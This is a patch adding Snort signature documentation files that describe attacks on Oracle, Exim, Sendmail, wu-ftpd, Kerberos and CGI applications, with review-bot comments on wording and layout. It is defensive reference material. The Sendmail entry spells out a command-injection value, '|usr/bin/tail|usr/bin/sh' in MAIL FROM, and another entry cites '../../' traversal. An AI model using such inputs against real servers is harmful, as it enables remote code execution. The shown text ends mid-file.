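Review bot: Summary grammar: "a webpage was visited the included the content" should read "a webpage was visited that included the content". Drop "etc.etc." at the end of False Positives. Layout departs from the template: there is no blank line between "Rule:" and "--", there is a blank line between "Sid:" and the number, and six empty lines precede the closing "--" under Additional References. Detailed Information's statement that the rule matches a web server response containing "BDSM" is the one concrete fact here and should stay.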
--- /dev/null
+++ b/doc/signatures/2737.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2737
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_nchar
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
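Review bot: Same defects as 2906.txt: a stray line break before the period after "alter_priority_nchar" in Detailed Information, "Oracle Oracle9i" in Affected Systems, and an empty Additional References section. This entry names the package as "dbms_repcat" while 2906.txt uses the schema-qualified "sys.dbms_repcat_sna"; qualify package names consistently across the Oracle docs.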
--- /dev/null
+++ b/doc/signatures/1318.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1318
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "hardcore rape".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "hardcore rape".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
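Review bot: Same issues as 1797.txt: "a webpage was visited the included the content" should be "that included the content", there is a blank line between "Sid:" and the number, and a run of empty lines precedes the closing "--" under Additional References. The "--" after "None known." under False Negatives is missing the blank line that separates every other section.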
--- /dev/null
+++ b/doc/signatures/2595.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2595
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
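Review bot: The "Additional References" header is missing its colon, and there are two blank lines after "Rule:" and after the SID where the template uses one. Detailed Information usefully states that the vulnerable configuration (verifying header syntax in the message body) is not the default; that fact belongs under False Positives as well, since the rule will match the malformed header whether or not the receiving Exim is configured to verify it.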
--- /dev/null
+++ b/doc/signatures/817.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+817
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
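Review bot: Typo "running ona web server" in Detailed Information should be "running on a web server". Affected Systems and Additional References are empty, and the Summary and Detailed Information are generic authentication boilerplate that never say what SID 817 matches. Corrective Action's "Disallow administrative access from sources external to the protected network" is the one specific mitigation here; pairing it with the pattern the rule keys on would make it actionable.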
--- /dev/null
+++ b/doc/signatures/1932.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1932
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
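Review bot: Body text is identical to 810.txt, including the "ona" typo in Detailed Information, so nothing distinguishes SID 1932 from SID 810; name the CGI application or pattern this rule matches, fix the typo, and add a reference.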
--- /dev/null
+++ b/doc/signatures/1895.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid: 1895
+
+--
+Summary:
+This event is generated when an attempt is made to exploit 
+vulnerable versions of the Kerberos version 4 administration daemon 
+(kadmind).
+
+--
+Impact:
+Serious. System compromize presenting the attacker with the opportunity to execute arbitrary code or gain unauthorized access to the target host along with other hosts in the kerberos realm.
+
+--
+Detailed Information:
+kadmind is used to administer a Kerberos database on the master key distribution center (KDC) of a kerberos realm.
+
+A buffer overflow condition exists in kadmind4 such that when the daemon parses a length value in an administration request the attacker can gain the ability to execute arbitrary code with the privileges of the user running the daemon, usually root.
+
+Authentication is not required to cause the overflow.
+
+Affected Systems:
+	Multiple vendors using kadmind version 4
+
+--
+Attack Scenarios:
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2002-29.html
+http://www.kb.cert.org/vuls/id/875073
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1235
+
+--
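Review bot: "Sid: 1895" is on one line while every other file puts the number on the line after "Sid:"; the missing "--" separator before "Affected Systems:" and the unwrapped long lines in Impact and Detailed Information also depart from the template. "compromize" in Impact should be "compromise" and "kerberos realm" should use the capitalised "Kerberos". "Exploit scripts are available" under Attack Scenarios describes availability, not a scenario, and duplicates Ease of Attack; describe instead the unauthenticated administration request with a bad length value that Detailed Information says triggers the overflow.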
--- /dev/null
+++ b/doc/signatures/343.txt
@@ -0,0 +1,60 @@
+SID:
+343
+--
+
+Rule:
+--
+
+Summary:
+This event is generated when an attack attempt is made against an ftp 
+server possibly running a vulnerable ftpd running on FreeBSD
+--
+
+Impact:
+Possible remote execution of commands on the affected server as the root user
+--
+
+Detailed Information:
+The Washington University ftp daemon (wu-ftpd) does not perform proper 
+checking in its SITE EXEC implementation, and allows user input to be 
+sent directly to printf. This allows an attacker to overwrite data and 
+eventually execute code on the server.
+
+--
+
+Affected Systems:
+Any system running wu-ftpd 2.6 .0 or below
+--
+
+Attack Scenarios:
+A remote attacker will attempt to execute commands on the ftp server 
+with root user privileges, over writing or modifying system files. This 
+can be done with anonymous and real user logins.
+--
+
+Ease of Attack:
+Simple, Exploits exist
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Upgrade to latest version which has fixes for this problem. Maybe even get rid of wu-ftp with something more secure
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
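Review bot: Summary says "a vulnerable ftpd running on FreeBSD" while Detailed Information describes the wu-ftpd SITE EXEC flaw (user input passed directly to printf), which is not specific to FreeBSD; make the Summary name wu-ftpd. Section order ("SID:" before "Rule:"), the upper-case "SID", and the "References:" header all differ from the template. "2.6 .0" in Affected Systems has a stray space, and "over writing" should be "overwriting". Corrective Action's "Maybe even get rid of wu-ftp with something more secure" is too informal for an advisory; state the fixed version and suggest replacing the daemon in neutral wording. References is empty for a widely documented issue; cite the CERT advisory and CVE entry.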
--- /dev/null
+++ b/doc/signatures/1116.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1116
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
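Review bot: Summary and Detailed Information are generic ("a known vulnerability on a web server") and never state what SID 1116 matches, and Additional References is empty; without the target pattern an analyst cannot triage the event. "the attack scenarios are legion" is filler and should be replaced with the vector the rule detects.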
--- /dev/null
+++ b/doc/signatures/211.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+211
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Telnet server using the phrase "r00t".
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and 
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
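Review bot: "False Positives: None Known" is hard to reconcile with the Summary, which says the rule fires when an attacker "attempts to connect to a Telnet server using the phrase "r00t""; any Telnet session that legitimately carries that string (an account actually named r00t, for instance) would match, and that should be documented. Detailed Information opens with "This Trojan affects UNIX operating systems:" and then nothing follows the colon, and the Trojan is never named; the file also lacks the Affected Systems section every other signature file carries. Minor: "Use SSH as opposed to Telnet for access from external locations" is missing its period, and "None Known" is capitalised differently from the "None known." used elsewhere in the set.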
--- /dev/null
+++ b/doc/signatures/665.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+665
+
+--
+Summary:
+This event is generated when a remote user attempts to exploit a Sendmail vulnerability where a remote user can execute arbitrary code on an server running older versions of Sendmail. 
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Earlier versions of Sendmail contain a vulnerability in message header parsing. This vulnerability can be exploited by a remote user who sends an email message with a malformed MAIL FROM value to a vulnerable Sendmail implementation. The server then executes any arbitrary shell code included in the text of the email. 
+
+--
+Affected Systems:
+Systems running Sendmail versions lower than 8.6.10.
+
+--
+Attack Scenarios:
+An attacker sends an email using |usr/bin/tail|usr/bin/sh as the MAIL FROM value. Arbitrary shell code placed in the text of the email message is executed by the mail server with the security context of Sendmail.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Sendmail version 8.6.10 or higher.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0203
+
+Bugtraq
+http://www.securityfocus.com/bid/2308
+
+CERT
+http://www.cert.org/advisories/CA-1995-08.html
+
+--
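Review bot: "execute arbitrary code on an server" in Summary should read "on a server". Several lines in this file end in trailing whitespace ("...older versions of Sendmail. ", "...remote root compromise. ", "Simple. "); strip them to match the rest of the set. The reference labels here ("CVE", "Bugtraq", "CERT") are written without the trailing colon that 2311.txt and 2086.txt use ("CERT:", "Microsoft:", "Bugtraq:"); pick one convention for all files.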
--- /dev/null
+++ b/doc/signatures/803.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+803
+
+--
+Summary:
+This event is generated when an attempt is made to access hsx.cgi and 
+then utilize a directory traversal technique to read files outside the 
+root directory of the web server. This indicates an attempt to exploit a
+vulnerability in the Hyperseek 2000 search engine that allows 
+read-access to directory listings and files.
+
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a directory traversal vulnerability in HyperSeek 2000. When directory traversal techniques such as ../../ are used as arguments to hsx.cgi, an unauthorized user can navigate to directories and access files that are normally hidden. 
+
+--
+Affected Systems:
+Web servers running iWeb Systems HyperSeek 2000 are vulnerable. 
+
+--
+Attack Scenarios:
+An attacker can use a directory traversal technique when executing hsx.cgi to view hidden directories and files on the web server.
+
+--
+Ease of Attack:
+Simple. Exploits exist. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Uprade to the latest non-affected version of the software.
+
+--
+Contributors:
+Original rule writer unknown
+Rule modified by Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2314
+
+CERT/CC
+http://www.kb.cert.org/vuls/id/146704
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0253
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10602
+
+--
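Review bot: "Uprade to the latest non-affected version of the software." in Corrective Action is a typo for "Upgrade". The product name is spelled "Hyperseek 2000" in Summary but "HyperSeek 2000" in Detailed Information and Affected Systems; use one spelling. There is a double blank line between the Summary paragraph and the following "--" separator, and "Simple. Exploits exist. " carries a trailing space, both inconsistent with the other files.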
--- /dev/null
+++ b/doc/signatures/2311.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2311
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft Windows Workstation service.
+
+--
+Impact:
+Serious. Denial of Service (DoS), execution of arbitrary code is
+possible.
+
+--
+Detailed Information:
+Due to insufficient bounds checking in the Microsoft Windows Workstation
+service, it may be possible for an attacker to overwrite portions of
+memory. This can result in the attacker being presented with the
+opportunity to execute code of their choosing. Under some circumstances
+a Denial of Service condition may be possible against the target host.
+
+Specifically, the DCE/RPC service allows for overly long strings to be
+sent to the Workstation logging function. This logging function does not
+check parameters sufficiently which results in the buffer overflow
+condition.
+
+--
+Affected Systems:
+	Microsoft Windows 2000 Service Pack 2, Service Pack 3, Service Pack 4
+	Microsoft Windows XP, Microsoft Windows XP Service Pack 1
+	Microsoft Windows XP 64-Bit Edition
+
+--
+Attack Scenarios:
+The attacker may use one of the available exploits to target a
+vulnerable host.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches and service packs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2003-28.html
+http://www.kb.cert.org/vuls/id/567620
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-049.asp
+
+--
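Review bot: "False Negatives: None known" lacks the period used in the matching "False Positives: None known." two sections above. Attack Scenarios ("The attacker may use one of the available exploits to target a vulnerable host.") adds nothing beyond what Ease of Attack already says; since Detailed Information already names the trigger (overly long strings sent over DCE/RPC to the Workstation logging function), a one-line restatement of that here would make the section useful to an analyst reading the alert.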
--- /dev/null
+++ b/doc/signatures/100000749.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000749
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Plume CMS" application running on a webserver. Access to the file "search.php" using a remote file being passed as the "_PX_config[manager_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "_PX_config[manager_path]" parameter in the "search.php" script used by the "Plume CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Plume CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1634.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+1634
+
+--
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Artisoft XtraMail v1.11 mailserver.
+
+--
+Impact:
+When succesfully exploited, the remote attacker can crash the POP3
+service and possibly execute arbitrary code on the mailserver.
+
+--
+Detailed Information:
+The PASS argument, used to submit authentication credentials to the 
+POP3 server XtraMail 1.11, has an exploitable buffer overflow condition 
+If a password of more than 1500 characters is submitted, the
+service will crash.  This error may be exploitable further, and could 
+then allow the attacker to execute arbitrary code on the remote system, 
+under the LocalSystem account.
+
+--
+Affected Systems:
+	All POP3 servers running Artisoft Xtramail 1.11 on Windows.
+
+--
+Attack Scenarios:
+An attacker could crash the POP server, thereby denying
+legitimate users access to their e-mail.  Skilled attackers could
+compromise the mailserver and obtain all incoming e-mail data.
+
+--
+Ease of Attack:
+The DoS attack is trivial to execute, as only a password
+longer than 1500 characters needs to be submitted.  Compromise of the
+mailserver requires more skill, but exploits are available.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Upgrade XtraMail to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Maarten Van Horenbeeck (maarten@daemon.be)
+--
+Additional References:
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=10325
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1511
+
+Bugtraq
+http://www.securityfocus.com/bid/791
+
+--
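Review bot: in Detailed Information the sentence ending "has an exploitable buffer overflow condition" runs straight into "If a password of more than 1500 characters is submitted" with no period between them. "When succesfully exploited" should be "successfully"; the product is "XtraMail" in Summary and Corrective Action but "Xtramail" in Affected Systems; "Summary: " carries a trailing space; "Upgrade XtraMail to the latest non-affected version of the software" and "False Negatives: None known" lack periods; and there is no blank line between the last Contributors entry and the "--" separator.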
--- /dev/null
+++ b/doc/signatures/100000602.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000602
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "inv_overdue.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "inv_overdue.php" 
+script used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/2793.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2793
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure purge_statistics
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
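Review bot: Detailed Information breaks a sentence across lines at the wrong place: "vulnerability in the procedure purge_statistics" / ". This procedure is included in" / "dbms_repcat." The period belongs on the first of those lines; this looks like leftover template substitution and should be joined into one sentence. Affected Systems reads "Oracle Oracle9i" (duplicated word). "Apply the appropriate vendor supplied patch" has no period, "Rule: ", "Sid: ", "Summary: " and several "-- " separators carry trailing whitespace, and Additional References is empty.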
--- /dev/null
+++ b/doc/signatures/856.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+856
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
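Review bot: "a CGI application running ona web server" needs "on a", and "attackers choosing" (in Impact and again in Detailed Information) should be "attacker's choosing". The line "relationships between the victim server and other hosts can be exploited by the attacker." overruns the wrap width used for the rest of the paragraph and should be reflowed. Additional References is empty.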
--- /dev/null
+++ b/doc/signatures/2086.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2086
+
+--
+Summary:
+parse_xml.cgi script on a webserver via the quicktime streaming port.
+
+--
+Impact:
+Arbitrary code execution, information disclosure and possible cross site
+scripting.
+
+--
+Detailed Information:
+Multiple vulnerabilities exist in Apple Quick Time Streaming Server and 
